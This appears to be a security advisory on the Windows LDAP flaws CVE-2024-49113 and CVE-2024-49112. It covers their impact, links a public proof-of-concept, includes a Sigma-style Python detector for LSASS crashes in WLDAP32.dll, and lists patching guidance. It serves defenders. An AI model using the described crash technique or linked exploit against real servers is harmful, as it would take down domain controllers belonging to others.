LDAPNightmare, identified as CVE-2024-49113, is a denial-of-service (DoS) vulnerability in Microsoft’s Lightweight Directory Access Protocol (LDAP) affecting various Windows versions. Discovered in December 2024 by security researcher Yuki Chen, this flaw allows remote, unauthenticated attackers to crash the Local Security Authority Subsystem Service (LSASS) on unpatched Windows servers, leading to system reboots. CVE-2024-49112 allows remote, unauthenticated attackers to execute arbitrary code within the context of the LDAP service by sending specially crafted Remote Procedure Call (RPC) requests.

On January 1, 2025, SafeBreach Labs released a proof-of-concept (PoC) exploit demonstrating how an attacker can crash any unpatched Windows Server by sending a specially crafted Connectionless LDAP (CLDAP) referral response packet. The PoC can be found here: https://github.com/SafeBreach-Labs/CVE-2024-49113

Microsoft addressed both CVE-2024-49112 and CVE-2024-49113 in its December 2024 Patch Tuesday updates. Organizations are strongly advised to apply these patches immediately to protect their systems from potential exploitation.

Detection

On January 8, 2025, a pull request was opened against the SigmaHQ repository containing a potential detection opportunity. The rule looks for crashes of the LSASS process involving WLDAP32.dll, as recorded in the Windows Application log under Event ID 1000.

This pull request can be found here: https://github.com/SigmaHQ/sigma/pull/5155
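As an added example (not the Sigma rule itself, and not code from the CyberMaxx post), the Python below applies the same logic to exported Application log records: Event ID 1000 from the Application Error provider where the faulting application is lsass.exe and the faulting module is WLDAP32.dll. The events are constructed for the demonstration, and the field names (EventID, Provider, Computer, Message) are an assumption; map your export’s property names onto them. On a domain controller the records can be pulled with Get-WinEvent -FilterHashtable @{LogName='Application'; Id=1000} and the Message text fed in unchanged.

```python
import re

# Field labels used in the Message of a Windows "Application Error" event 1000.
FAULTING_APP = re.compile(r"Faulting application name:\s*([^,]+)", re.IGNORECASE)
FAULTING_MODULE = re.compile(r"Faulting module name:\s*([^,]+)", re.IGNORECASE)


def parse_event_1000(message):
    """Return (faulting application, faulting module), lower-cased, from an
    Event 1000 message; empty strings when a field is missing."""
    app = FAULTING_APP.search(message)
    mod = FAULTING_MODULE.search(message)
    return (app.group(1).strip().lower() if app else "",
            mod.group(1).strip().lower() if mod else "")


def is_ldapnightmare_crash(event):
    """Mirror the Sigma logic: Event ID 1000 from Application Error where
    lsass.exe faulted inside WLDAP32.dll."""
    if event.get("EventID") != 1000:
        return False
    if event.get("Provider", "").lower() != "application error":
        return False
    app, mod = parse_event_1000(event.get("Message", ""))
    return app.endswith("lsass.exe") and mod.endswith("wldap32.dll")


def detect(events):
    """Return the events matching the LDAPNightmare crash pattern."""
    return [e for e in events if is_ldapnightmare_crash(e)]


# Constructed sample events (not real captures). Version strings and time
# stamps are placeholders; the Message layout follows a real Event 1000.
SAMPLE_EVENTS = [
    {"EventID": 1000, "Provider": "Application Error", "Computer": "DC01",
     "Message": "Faulting application name: lsass.exe, version: 10.0.20348.0, time stamp: 0x00000000\n"
                "Faulting module name: WLDAP32.dll, version: 10.0.20348.0, time stamp: 0x00000000\n"
                "Exception code: 0xc0000005"},
    {"EventID": 1000, "Provider": "Application Error", "Computer": "DC01",
     "Message": "Faulting application name: lsass.exe, version: 10.0.20348.0, time stamp: 0x00000000\n"
                "Faulting module name: ntdll.dll, version: 10.0.20348.0, time stamp: 0x00000000"},
    {"EventID": 1000, "Provider": "Application Error", "Computer": "WS07",
     "Message": "Faulting application name: explorer.exe, version: 10.0.19041.0, time stamp: 0x00000000\n"
                "Faulting module name: WLDAP32.dll, version: 10.0.19041.0, time stamp: 0x00000000"},
    {"EventID": 1026, "Provider": ".NET Runtime", "Computer": "DC01",
     "Message": "Application: w3wp.exe"},
]

if __name__ == "__main__":
    for e in detect(SAMPLE_EVENTS):
        print(e["Computer"], "lsass.exe crashed in WLDAP32.dll (possible CVE-2024-49113)")
```

The second sample, an lsass crash in ntdll.dll, is deliberately not matched, which mirrors the rule’s scope; any LSASS crash on a domain controller is still worth a look, since the reboot the post describes follows regardless of which module faulted.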

Mitigation

Apply the updates Microsoft shipped in the December 2024 Patch Tuesday release. Also configure Extended Protection for Authentication (EPA) for LDAP, as recommended by Microsoft; this adds an additional layer of protection against exploitation.

This post will be updated as more information becomes available throughout the coming days.
